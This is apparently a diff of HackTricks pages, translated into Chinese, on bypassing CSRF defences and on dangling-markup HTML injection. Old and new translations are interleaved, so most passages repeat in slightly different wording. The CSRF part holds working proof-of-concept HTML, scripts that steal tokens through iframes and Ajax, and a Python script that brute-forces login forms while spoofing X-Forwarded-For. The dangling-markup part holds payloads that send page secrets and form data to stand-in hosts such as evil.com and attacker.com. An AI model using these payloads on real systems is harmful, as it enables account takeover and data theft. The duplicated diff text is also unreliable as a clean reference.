* **CSRF令牌**在每个会话中加入唯一的CSRF令牌并要求在后续请求中使用此令牌可以显著减轻CSRF的风险。通过强制执行CORS可以增强令牌的有效性。
* **检查引荐或来源头**:验证这些头可以帮助确保请求来自受信任的来源。然而,精心构造的 URL 可以绕过实施不当的检查,例如:
* 使用 `http://mal.net?orig=http://example.com`URL 以受信任的 URL 结尾)
* 使用 `http://example.com.mal.net`URL 以受信任的 URL 开头)
* **修改参数名称**:更改 POST GET 请求中参数名称可以帮助防止自动化攻击。
* **CSRF 令牌**:在每个会话中加入唯一的 CSRF 令牌,并要求在后续请求中使用该令牌,可以显著降低 CSRF 的风险。通过强制实施 CORS可以增强令牌的有效性。
理解并实施这些防御措施对于维护Web应用程序的安全性和完整性至关重要。
理解和实施这些防御措施对于维护 web 应用程序的安全性和完整性至关重要。
## 防御绕过
### 从POST到GET
### 从 POST GET
也许您想要滥用的表单准备发送一个**带有CSRF令牌的POST请求**,但是,您应该**检查**是否**GET**也是**有效的**以及当您发送GET请求时**CSRF令牌是否仍在验证**
也许您想要利用的表单准备发送带有 CSRF 令牌的 **POST 请求,但**,您应该 **检查** 如果 **GET** 也是 **有效的**,并且当您发送 GET 请求时 **CSRF 令牌仍在被验证**
### 缺少令牌
应用程序可能会实施一种机制来**验证令牌**是否存在。但是,如果在令牌不存在时完全跳过验证,则会出现漏洞。攻击者可以通过**删除携带令牌的参数**而不仅仅是其值来利用这一点。这使他们可以规避验证过程并有效地进行跨站请求伪造CSRF攻击。
应用程序可能会实现一种机制来 **验证令牌**,当它们存在时。然而,如果在令牌缺失时完全跳过验证,就会出现漏洞。攻击者可以通过 **删除携带令牌的参数**,而不仅仅是其值来利用这一点。这使他们能够绕过验证过程,有效地进行跨站请求伪造 (CSRF) 攻击。
### CSRF令牌未绑定到用户会话
### CSRF 令牌未与用户会话绑定
应用程序**未将CSRF令牌绑定到用户会话**会带来重大的**安全风险**。这些系统会对全局池中的令牌进行验证,而不是确保每个令牌都绑定到发起会话
未将 CSRF 令牌与用户会话绑定的应用程序存在重大 **安全风险**。这些系统验证令牌是针对 **全局池** 而不是确保每个令牌与发起会话绑定
以下是攻击者如何利用这一点的方法
攻击者如何利用这一点:
1. 使用自己的帐户**进行身份验证**
2. 从全局池中**获取有效的CSRF令牌**。
3. **使用此令牌**对受害者进行CSRF攻击
1. **使用自己的账户进行身份验证**
2. **从全局池中获取有效的 CSRF 令牌**
3. **在针对受害者的 CSRF 攻击中使用此令牌**
种漏洞允许攻击者代表受害者进行未经授权的请求,利用应用程序的**不足的令牌验证机制**
一漏洞使攻击者能够代表受害者发起未经授权的请求,利用应用程序的 **不充分的令牌验证机制**
### 方法绕过
如果请求使用了一个“**奇怪的**”**方法**,请检查**方法** **覆盖功能**是否有效。例如,如果**使用PUT**方法,您可以尝试**使用POST**方法并**发送**_https://example.com/my/dear/api/val/num?**\_method=PUT**_
如果请求使用了一个“**奇怪的**” **方法**,请检查 **方法** **覆盖功能** 是否有效。例如,如果**使用 PUT** 方法,您可以尝试 **使用 POST** 方法并 **发送**_https://example.com/my/dear/api/val/num?**\_method=PUT**_
这也可以通过在POST请求中发送**\_method参数**或使用**头**来实现:
这也可以通过在 POST 请求中发送 **\_method 参数** 或使用 **头** 来实现:
* _X-HTTP-Method_
* _X-HTTP-Method-Override_
* _X-Method-Override_
### 自定义头令牌绕过
### 自定义头令牌绕过
如果请求在请求中添加了一个带有**令牌**的**自定义标头**作为**CSRF保护方法**,那么:
如果请求在请求中添加了一个 **自定义头**,并将 **令牌** 作为 **CSRF 保护方法**,那么:
* 在没有**自定义令牌和标头**的情况下测试请求。
* 使用**完全相同长度但不同令牌**测试请求
* 测试不带 **自定义令牌和头**请求。
* 测试请求,使用相同 **长度但不同的令牌**
### 通过cookie验证CSRF令牌
### CSRF 令牌通过 cookie 验证
应用程序可能通过在cookie和请求参数中复制令牌或通过设置CSRF cookie并验证后端发送的令牌来实现CSRF保护。应用程序通过检查请求参数中的令牌是否与cookie中的值对齐来验证请求。
应用程序可能通过在 cookie 和请求参数中复制令牌或通过设置 CSRF cookie 并验证后端发送的令牌是否与 cookie 中的值相对应来实现 CSRF 保护。应用程序通过检查请求参数中的令牌是否与 cookie 中的值对齐来验证请求。
但是如果网站存在允许攻击者在受害者浏览器中设置CSRF cookie的缺陷例如CRLF漏洞此方法容易受到CSRF攻击。攻击者可以通过加载设置cookie的欺骗性图像然后发起CSRF攻击来利用这一点
然而,如果网站存在漏洞,允许攻击者在受害者的浏览器中设置 CSRF cookie例如 CRLF 漏洞,则此方法容易受到 CSRF 攻击。攻击者可以通过加载一个欺骗性的图像来设置 cookie然后发起 CSRF 攻击
以下是攻击可能构建的示例:
以下是攻击可能如何构建的示例:
```html
<html>
<!-- CSRF Proof of Concept - generated by Burp Suite Professional -->
@ -124,20 +125,20 @@
```
{% hint style="info" %}
请注意,如果 **csrf token 与会话 cookie 相关联**,则此攻击将无效,因为您需要将您的会话设置给受害者,因此您将攻击自己。
注意,如果**csrf token与会话cookie相关这个攻击将不起作用**,因为你需要将会话设置为受害者,因此你实际上是在攻击自己。
{% endhint %}
### Content-Type 更改
根据[**此处**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple\_requests),为了**避免预检请求**使用 **POST** 方法,这些是允许的 Content-Type 值:
根据[**这个**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple\_requests),为了**避免预检**请求使用**POST**方法允许的Content-Type值如下
* **`application/x-www-form-urlencoded`**
* **`multipart/form-data`**
* **`text/plain`**
但是,请注意,**服务器逻辑可能会有所不同**取决于使用的 **Content-Type**,因此您应该尝试提到的值和其他值,如 **`application/json`**_**,**_**`text/xml`****`application/xml`**_._
然而,请注意,**服务器逻辑可能会有所不同**,具体取决于使用的**Content-Type**,因此你应该尝试提到的值以及其他值,如**`application/json`**_**,**_**`text/xml`**, **`application/xml`**_._
发送 JSON 数据作为 text/plain 的示例(来自[此处](https://brycec.me/posts/corctf\_2021\_challenges)
示例(来自[这里](https://brycec.me/posts/corctf\_2021\_challenges)将JSON数据作为text/plain发送
```html
<html>
<body>
@ -150,23 +151,23 @@ form.submit();
</body>
</html>
```
### 绕过预检请求以获取JSON数据
### 绕过 JSON 数据的预检请求
在尝试通过POST请求发送JSON数据时在HTML表单中使用 `Content-Type: application/json` 是不直接可能的。同样,利用 `XMLHttpRequest` 发送这种内容类型会启动一个预检请求。尽管如此仍然有策略可以潜在地绕过这种限制并检查服务器是否处理JSON数据而不考虑Content-Type
在尝试通过 POST 请求发送 JSON 数据时,在 HTML 表单中使用 `Content-Type: application/json` 是不直接可能的。同样,利用 `XMLHttpRequest` 发送此内容类型会启动预检请求。然而,有一些策略可以潜在地绕过此限制,并检查服务器是否处理 JSON 数据而不考虑 Content-Type
1. **使用替代内容类型**:通过在表单中设置 `enctype="text/plain"`使用 `Content-Type: text/plain``Content-Type: application/x-www-form-urlencoded`。这种方法测试后端是否使用数据,而不考虑Content-Type。
2. **修改内容类型**:为了避免预检请求,同时确保服务器将内容识别为JSON您可以使用 `Content-Type: text/plain; application/json` 发送数据。这不会触发预检请求,但如果服务器配置为接受 `application/json`,则可能会被正确处理。
3. **SWF Flash文件利用**一种较不常见但可行的方法涉及使用SWF Flash文件来绕过此类限制。要深入了解这种技术请参考[此文章](https://anonymousyogi.medium.com/json-csrf-csrf-that-none-talks-about-c2bf9a480937)。
1. **使用替代内容类型**:通过在表单中设置 `enctype="text/plain"`使用 `Content-Type: text/plain``Content-Type: application/x-www-form-urlencoded`。这种方法测试后端是否利用数据而不考虑 Content-Type。
2. **修改内容类型**:为了避免预检请求,同时确保服务器将内容识别为 JSON您可以发送 `Content-Type: text/plain; application/json`数据。这不会触发预检请求,但如果服务器配置为接受 `application/json`,则可能会被正确处理。
3. **SWF Flash 文件利用**:一种不太常见但可行的方法是使用 SWF Flash 文件来绕过此类限制。有关此技术的深入理解,请参阅 [这篇文章](https://anonymousyogi.medium.com/json-csrf-csrf-that-none-talks-about-c2bf9a480937)。
### 绕过引用者/来源检查
### 引用 / 来源检查绕过
**避免引用**
**避免引用头**
应用程序可能仅在存在时验证 'Referer' 头部。为了防止浏览器发送此头部可以使用以下HTML meta标签:
应用程序可能仅在 'Referer' 头存在时进行验证。为了防止浏览器发送此头,可以使用以下 HTML 元标签:
```xml
<meta name="referrer" content="never">
```
样可以确保省略“Referer”标头,从而可能绕过某些应用程序中的验证检查。
确保了“Referer”头被省略,从而可能绕过某些应用程序中的验证检查。
**正则表达式绕过**
@ -174,7 +175,7 @@ form.submit();
[url-format-bypass.md](ssrf-server-side-request-forgery/url-format-bypass.md)
{% endcontent-ref %}
要在URL中设置服务器的域名以便Referrer将其发送到参数中可以执行:
要在Referrer将要在参数中发送的URL中设置服务器的域名可以执行
```html
<html>
<!-- Referrer policy needed to send the qury parameter in the referrer -->
@ -193,25 +194,25 @@ document.forms[0].submit();
</body>
</html>
```
### **HEAD方法绕过**
### **HEAD 方法绕过**
[**这篇CTF解密**](https://github.com/google/google-ctf/tree/master/2023/web-vegsoda/solution)的第一部分解释了[Oak的源代码](https://github.com/oakserver/oak/blob/main/router.ts#L281),一个路由器被设置为**将HEAD请求处理为无响应主体的GET请求** - 这是一个常见的解决方法不仅仅适用于Oak。与处理HEAD请求的特定处理程序不同它们**只是交给GET处理程序但应用程序会删除响应主体**。
[**这个 CTF 文章**](https://github.com/google/google-ctf/tree/master/2023/web-vegsoda/solution)的第一部分解释了[Oak 的源代码](https://github.com/oakserver/oak/blob/main/router.ts#L281),一个路由器被设置为**将 HEAD 请求作为 GET 请求处理**,且没有响应体——这是一种常见的变通方法,并不是 Oak 独有的。它们并没有特定的处理程序来处理 HEAD 请求,而是**直接交给 GET 处理程序,但应用程序只是移除了响应体**。
因此,如果GET请求受限您可以**发送一个将被处理为GET请求的HEAD请求**。
因此,如果 GET 请求受到限制,你可以**发送一个将被处理为 GET 请求的 HEAD 请求**。
## **利用示例**
### **窃取CSRF令牌**
### **提取 CSRF 令牌**
如果正在使用**CSRF令牌**作为**防御**,您可以尝试**滥用[XSS](xss-cross-site-scripting/#xss-stealing-csrf-tokens)漏洞或[悬挂标记](dangling-markup-html-scriptless-injection/)漏洞**来**窃取**它
如果使用了**CSRF 令牌**作为**防御**,你可以尝试通过利用[**XSS**](xss-cross-site-scripting/#xss-stealing-csrf-tokens)漏洞或[**悬挂标记**](dangling-markup-html-scriptless-injection/)漏洞来**提取它**
### **使用HTML标签进行GET**
### **使用 HTML 标签的 GET**
```xml
<img src="http://google.es?param=VALUE" style="display:none" />
<h1>404 - Page not found</h1>
The URL you are requesting is no longer available
```
其他可以用来自动发送GET请求的HTML5标签有
其他可以用来自动发送 GET 请求的 HTML5 标签包括
```html
<iframe src="..."></iframe>
<script src="..."></script>
@ -342,7 +343,7 @@ body += "--" + boundary + "--";
//xhr.send(body);
xhr.sendAsBinary(body);
```
### 在iframe内部发起表单POST请求
### 从 iframe 内部发送表单 POST 请求
```html
<--! expl.html -->
@ -445,7 +446,7 @@ document.forms[0].submit.click();
}
</script>
```
### **窃取令牌并使用2个iframe发送**
### **窃取令牌并使用 2 iframe 发送**
```html
<script>
var token;
@ -475,7 +476,7 @@ height="600" width="800"></iframe>
<button type="submit">Submit</button>
</form>
```
### **使用Ajax窃取CSRF令牌并使用表单发送POST请求**
### **POST通过Ajax窃取CSRF令牌并使用表单发送POST**
```html
<body onload="getData()">
@ -502,7 +503,7 @@ document.getElementById("form").submit();
}
</script>
```
### 使用 Socket.IO 进行 CSRF
### CSRF与Socket.IO
```html
<script src="https://cdn.jsdelivr.net/npm/socket.io-client@2/dist/socket.io.js"></script>
<script>
@ -523,9 +524,9 @@ room: username
});
</script>
```
## CSRF登录暴力破解
## CSRF 登录暴力破解
该代码可用于使用CSRF令牌对登录表单进行暴力破解还使用了头部X-Forwarded-For尝试绕过可能的IP黑名单):
该代码可用于通过 CSRF 令牌对登录表单进行暴力破解(它还使用了 X-Forwarded-For 头来尝试绕过可能的 IP 黑名单):
```python
import request
import re
@ -569,12 +570,12 @@ with open(PASS_LIST, "r") as f:
for line in f:
login(USER, line.strip())
```
## 工具 <a href="#tools" id="tools"></a>
## Tools <a href="#tools" id="tools"></a>
* [https://github.com/0xInfection/XSRFProbe](https://github.com/0xInfection/XSRFProbe)
* [https://github.com/merttasci/csrf-poc-generator](https://github.com/merttasci/csrf-poc-generator)
## 参考资料
## References
* [https://portswigger.net/web-security/csrf](https://portswigger.net/web-security/csrf)
* [https://portswigger.net/web-security/csrf/bypassing-token-validation](https://portswigger.net/web-security/csrf/bypassing-token-validation)
@ -585,15 +586,30 @@ login(USER, line.strip())
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和赏金猎人交流!
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
**黑客见解**\
参与深入探讨黑客行为的刺激和挑战的内容
参与深入探讨黑客的刺激与挑战的内容
**实时黑客新闻**\
通过实时新闻和见解了解快节奏的黑客世界
通过实时新闻和见解,跟上快速变化的黑客世界
**最新公告**\
了解最新的赏金计划发布和重要平台更新
了解最新的漏洞赏金计划和重要平台更新
**加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy) 并开始与顶尖黑客合作!
**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶级黑客合作!
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>支持 HackTricks</summary>
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,106 +1,90 @@
# Dangling Markup - HTML scriptless injection
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFT](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
## 简介
当发现**HTML注入**时,此技术可用于从用户那里提取信息。如果您**找不到利用**[**XSS**](../xss-cross-site-scripting/)的方法,但可以**注入一些HTML标记**,则此技术非常有用。\
如果某些**秘密以明文保存**在HTML中您想要**从客户端中提取**它,或者您想要误导某些脚本执行,这也很有用。
此技术可用于在发现 **HTML 注入** 时从用户提取信息。如果你 **找不到任何利用** [**XSS** ](../xss-cross-site-scripting/) 的方法,但可以 **注入一些 HTML 标签**,这将非常有用。\
如果某些 **秘密以明文形式** 保存在 HTML 中,并且你想从客户端 **提取** 它,或者如果你想误导某些脚本执行,这也很有用。
这里讨论的几种技术可以用于通过意想不到的方式html标记、CSS、http-meta标记、表单、base等**窃取信息**,从而绕过一些[**内容安全策略**](../content-security-policy-csp-bypass/)。
这里提到的几种技术可以通过以意想不到的方式html 标签、CSS、http-meta 标签、表单、base...)提取信息来绕过某些 [**内容安全策略**](../content-security-policy-csp-bypass/)。
## 主要应用
### 取明文秘密
### 取明文秘密
如果您注入 `<img src='http://evil.com/log.cgi?`,当页面加载时,受害者将向您发送从注入的`img`标记到代码中下一个引号之间的所有代码。如果某个秘密以某种方式位于该块中,您将窃取它(您也可以使用双引号执行相同操作,请查看哪种更有趣)。
如果`img`标记被禁止例如由于CSP您还可以使用 `<meta http-equiv="refresh" content="4; URL='http://evil.com/log.cgi?`
如果你在页面加载时注入 `<img src='http://evil.com/log.cgi?`,受害者将向你发送所有在注入的 `img` 标签和代码中的下一个引号之间的代码。如果某个秘密以某种方式位于该块中,你将偷取它(你也可以使用双引号,看看哪个更有趣)。
如果 `img` 标签被禁止(例如由于 CSP你也可以使用 `<meta http-equiv="refresh" content="4; URL='http://evil.com/log.cgi?`
```html
<img src='http://attacker.com/log.php?HTML=
<meta http-equiv="refresh" content='0; url=http://evil.com/log.php?text=
<meta http-equiv="refresh" content='0;URL=ftp://evil.com?a=
```
注意,**Chrome 阻止包含 "<" 或 "\n" 的 HTTP URL**,因此您可以尝试其他协议方案,如 "ftp"。
请注意,**Chrome会阻止包含"<"或"\n"的HTTP URL**,因此您可以尝试其他协议方案,如"ftp"。
您还可以滥用CSS `@import`(将发送直到找到";"为止的所有代码)。
您还可以滥用 CSS `@import`(将发送所有代码,直到找到 ";"
```html
<style>@import//hackvertor.co.uk? <--- Injected
<b>steal me!</b>;
```
你也可以使用\*\*`<table`\*\*
您还可以使用 **`<table`**
```html
<table background='//your-collaborator-id.burpcollaborator.net?'
```
您还可以插入一个`<base`标签所有信息将被发送直到引号关闭但这需要一些用户交互用户必须点击某个链接因为base标签会改变链接指向的域
您还可以插入一个 `<base` 标签。所有信息将在引号关闭之前发送,但这需要一些用户交互(用户必须点击某个链接,因为 base 标签将更改链接指向的域):
```html
<base target=' <--- Injected
steal me'<b>test</b>
```
### 窃取表单
### 偷取表单
```html
<base href='http://evil.com/'>
```
然后,发送数据到路径的表单(如 `<form action='update_profile.php'>`)将把数据发送到恶意域名。
然后,发送数据到路径的表单(如 `<form action='update_profile.php'>`)将发送数据到恶意域。
### Stealing forms 2
### 窃取表单 2
设置表单头:`<form action='http://evil.com/log_steal'>` 这将覆盖下一个表单头,所有来自表单的数据将被发送给攻击者。
设置一个表单头部:`<form action='http://evil.com/log_steal'>` 这将覆盖下一个表单头部,表单中的所有数据将被发送给攻击者。
### 窃取表单 3
按钮可以使用属性 "formaction" 更改表单信息将被发送到的 URL
### Stealing forms 3
按钮可以通过属性 "formaction" 更改信息将要发送到的表单的 URL
```html
<button name=xss type=submit formaction='https://google.com'>I get consumed!
```
攻击者可以利用这一点窃取信息。
攻击者可以利用这个漏洞来窃取信息
在这个[**报告中找到此攻击的示例**](https://portswigger.net/research/stealing-passwords-from-infosec-mastodon-without-bypassing-csp)
在这篇文章中找到了[**此攻击的示例**](https://portswigger.net/research/stealing-passwords-from-infosec-mastodon-without-bypassing-csp)。
### 窃取明文密码 2
使用最新提到的技术来窃取表单(注入新表单头),然后可以注入一个新的输入字段:
### 窃取明文秘密 2
使用最新提到的技术窃取表单(注入新的表单头),您可以然后注入一个新的输入字段:
```html
<input type='hidden' name='review_body' value="
```
并且这个输入字段将包含其双引号之间和下一个双引号之间的所有内容在HTML中。这个攻击将“_**Stealing clear text secrets**_”与“_**Stealing forms2**_”混合在一起。
这个输入字段将包含 HTML 中双引号之间的所有内容。这种攻击将"_**窃取明文密码**_"与"_**窃取表单2**_"混合在一起。
您可以通过注入一个表单和一个`<option>`标签来执行相同的操作。直到找到闭合的`</option>`标签之前的所有数据都将被发送:
你可以通过注入一个表单和一个`<option>`标签来做同样的事情。所有数据直到找到一个关闭的`</option>`将被发送:
```html
<form action=http://google.com><input type="submit">Click Me</input><select name=xss><option
```
### 表单参数注入
您可以更改表单的路径并插入新值,从而执行意外操作:
您可以更改表单的路径并插入新值,以便执行意外的操作:
```html
<form action='/change_settings.php'>
<input type='hidden' name='invite_user'
@ -114,40 +98,32 @@ value='fredmbogo'> ← Injected lines
...
</form>
```
### 通过 noscript 偷取明文秘密
### 通过noscript窃取明文密码
`<noscript></noscript>` 是一个标签如果浏览器不支持JavaScript其内容将被解释您可以在Chrome中的[chrome://settings/content/javascript](chrome://settings/content/javascript)启用/禁用JavaScript
从注入点到底部将网页内容导出到攻击者控制的站点的一种方法是注入以下内容:
`<noscript></noscript>` 是一个标签,其内容将在浏览器不支持 JavaScript 时被解释(您可以在 [chrome://settings/content/javascript](chrome://settings/content/javascript) 中启用/禁用 JavaScript
一种将从注入点到页面底部的网页内容导出到攻击者控制的网站的方法是注入以下内容:
```html
<noscript><form action=http://evil.com><input type=submit style="position:absolute;left:0;top:0;width:100%;height:100%;" type=submit value=""><textarea name=contents></noscript>
```
### Bypassing CSP with user interaction
### 通过用户交互绕过 CSP
从这个[portswiggers研究](https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup)中,你可以了解到即使在**最严格的 CSP 环境**中,仍然可以通过一些**用户交互**来**外泄数据**。在这种情况下,我们将使用以下有效载荷:
从这个 [portswiggers research](https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup) 中你可以了解到,即使在 **最严格的 CSP** 环境中,你仍然可以通过一些 **用户交互****提取数据**。在这种情况下,我们将使用以下有效载荷:
```html
<a href=http://attacker.net/payload.html><font size=100 color=red>You must click me</font></a>
<base target='
```
请注意,您将要求**受害者**点击一个链接,该链接将将**重定向**他到您控制的**有效负载**。还请注意,**`base`标签中的`target`属性将包含HTML内容**,直到下一个单引号。\
这将导致如果点击链接,**`window.name`的值**将是所有该**HTML内容**。因此,由于您**控制**受害者通过点击链接访问的页面,您可以访问\*\*`window.name`**并**外泄\*\*这些数据:
注意,你将要求**受害者**点击一个**链接**,该链接将**重定向**他到由你控制的**有效载荷**。还要注意,**`base`**标签中的**`target`**属性将包含**HTML内容**,直到下一个单引号。\
这将使得如果点击链接,**`window.name`**的**值**将是所有的**HTML内容**。因此,由于你**控制了受害者**通过点击链接访问的页面,你可以访问该**`window.name`**并**提取**该数据:
```html
<script>
if(window.name) {
new Image().src='//your-collaborator-id.burpcollaborator.net?'+encodeURIComponent(window.name);
</script>
```
### Misleading script workflow 1 - HTML namespace attack
### 误导性脚本工作流 1 - HTML 命名空间攻击
在 HTML 中插入一个带有 id 的新标签,该标签将覆盖下一个标签,并具有会影响脚本流程的值。在此示例中,您正在选择要与谁共享信息:
在 HTML 中插入一个带有 id 的新标签,该标签将覆盖下一个标签,并且其值将影响脚本的流程。在这个例子中,您正在选择与谁共享信息:
```html
<input type='hidden' id='share_with' value='fredmbogo'> ← Injected markup
...
@ -162,11 +138,9 @@ request.share_with = document.getElementById('share_with').value;
...
}
```
### 误导性脚本工作流程 2 - 脚本命名空间攻击
### 误导性脚本工作流 2 - 脚本命名空间攻击
通过插入HTML标签在javascript命名空间内创建变量。然后这个变量将影响应用程序的流程
通过插入 HTML 标签在 JavaScript 命名空间内创建变量。然后,这个变量将影响应用程序的流程:
```html
<img id='is_public'> ← Injected markup
@ -188,11 +162,9 @@ if (is_public) request.access_mode = AM_PUBLIC; ← Condition always e
...
}
```
### Abuse of JSONP
### 滥用 JSONP
如果你发现了一个 JSONP 接口,你可以调用任意函数并传入任意数据:
如果你发现一个 JSONP 接口,你可能能够使用任意数据调用任意函数:
```html
<script src='/editor/sharing.js'>: Legitimate script
function set_sharing(public) {
@ -204,25 +176,19 @@ else request.access_mode = AM_PRIVATE;
<script src='/search?q=a&call=set_sharing'>: Injected JSONP call
set_sharing({ ... })
```
或者您甚至可以尝试执行一些 JavaScript
或者你甚至可以尝试执行一些javascript
```html
<script src='/search?q=a&call=alert(1)'></script>
```
### Iframe 滥用
一个子文档具有查看和修改其父文档的 `location` 属性的能力,即使在跨域情况下也是如此。这允许在 **iframe** 中嵌入一个脚本,可以将客户端重定向到任意页面:
子文档能够查看和修改其父文档的 `location` 属性,即使在跨源情况下也是如此。这允许在 **iframe** 中嵌入一个脚本,可以将客户端重定向到任意页面:
```html
<html><head></head><body><script>top.window.location = "https://attacker.com/hacked.html"</script></body></html>
```
这可以通过类似于:`sandbox=' allow-scripts allow-top-navigation'` 来缓解。
这可以通过类似以下方式来减轻风险:`sandbox=' allow-scripts allow-top-navigation'`
一个iframe也可以被滥用来从不同页面泄露敏感信息**利用iframe的name属性**。这是因为你可以创建一个iframe它会通过滥用HTML注入来将**敏感信息显示在iframe的name属性内**然后从初始iframe访问该名称并泄露信息。
iframe 也可以被滥用来泄露来自不同页面的敏感信息 **使用 iframe name 属性**。这是因为你可以创建一个 iframe它自身嵌套 iframe利用 HTML 注入使 **敏感信息出现在 iframe name 属性中**,然后从初始 iframe 访问该名称并泄露它。
```html
<script>
function cspBypass(win) {
@ -233,31 +199,28 @@ setTimeout(()=>alert(win[0].name), 500);
<iframe src="//subdomain1.portswigger-labs.net/bypassing-csp-with-dangling-iframes/target.php?email=%22><iframe name=%27" onload="cspBypass(this.contentWindow)"></iframe>
```
For more info check [https://portswigger.net/research/bypassing-csp-with-dangling-iframes](https://portswigger.net/research/bypassing-csp-with-dangling-iframes)
### \<meta 滥用
您可以使用 **`meta http-equiv`** 执行**多个操作**,如设置 Cookie: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` 或执行重定向(在此情况下为 5 秒): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`
您可以使用 **`meta http-equiv`** 执行 **多个操作**如设置 Cookie: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` 或执行重定向(在此情况下为 5 秒): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`
这可以通过关于 **http-equiv****CSP** 来**避免**`Content-Security-Policy: default-src 'self';`, `Content-Security-Policy: http-equiv 'self';`
这可以通过关于 **http-equiv****CSP** **避免** `Content-Security-Policy: default-src 'self';``Content-Security-Policy: http-equiv 'self';`
### 新的 \<portal HTML 标签
您可以在这里找到关于 \<portal 标签可利用漏洞的非常**有趣的研究** [here](https://research.securitum.com/security-analysis-of-portal-element/)。\
在撰写本文时,您需要在 Chrome 中启用 portal 标签 `chrome://flags/#enable-portals`,否则它将无法正常工作。
您可以在 [这里](https://research.securitum.com/security-analysis-of-portal-element/) 找到关于 \<portal 标签可利用漏洞的非常 **有趣的研究**。\
在撰写本文时,您需要在 `chrome://flags/#enable-portals` 中启用 portal 标签,否则它将无法工作。
```html
<portal src='https://attacker-server?
```
### HTML 泄漏
### HTML泄漏
并非所有在 HTML 中泄漏连接的方式都对 Dangling Markup 有用,但有时它可能会有所帮助。请在这里查看: [https://github.com/cure53/HTTPLeaks/blob/master/leak.html](https://github.com/cure53/HTTPLeaks/blob/master/leak.html)
并非所有在HTML中泄漏连接的方式都对悬挂标记有用但有时可能会有帮助。在这里检查它们[https://github.com/cure53/HTTPLeaks/blob/master/leak.html](https://github.com/cure53/HTTPLeaks/blob/master/leak.html)
## SS-Leaks
## SS泄漏
这是**悬挂标记和XS-Leaks的混合**。一方面,该漏洞允许在我们将要攻击的**同源页面**中**注入HTML**但不包括JS。另一方面我们不会直接攻击可以注入HTML的页面而是**另一个页面**。
这是 **dangling markup 和 XS-Leaks****混合**。一方面,漏洞允许在 **同源** 的页面中 **注入 HTML**(但不包括 JS。另一方面我们不会直接 **攻击** 可以注入 HTML 的页面,而是 **另一个页面**
{% content-ref url="ss-leaks.md" %}
[ss-leaks.md](ss-leaks.md)
@ -265,33 +228,34 @@ For more info check [https://portswigger.net/research/bypassing-csp-with-danglin
## XS-Search/XS-Leaks
XS-Search旨在利用**侧信道攻击**滥用**窃取跨源信息**。因此这是一种与悬挂标记不同的技术然而一些技术滥用了包含HTML标记带有和不带有JS执行比如[**CSS注入**](../xs-search/#css-injection)或[**延迟加载图像**](../xs-search/#image-lazy-loading)**。**
XS-Search 旨在 **提取跨源信息**,利用 **侧信道攻击**。因此,这是一种不同于 Dangling Markup 的技术,然而,一些技术利用了 HTML 标签的包含(有和没有 JS 执行),如 [**CSS Injection**](../xs-search/#css-injection) 或 [**Lazy Load Images**](../xs-search/#image-lazy-loading)**.**
{% content-ref url="../xs-search/" %}
[xs-search](../xs-search/)
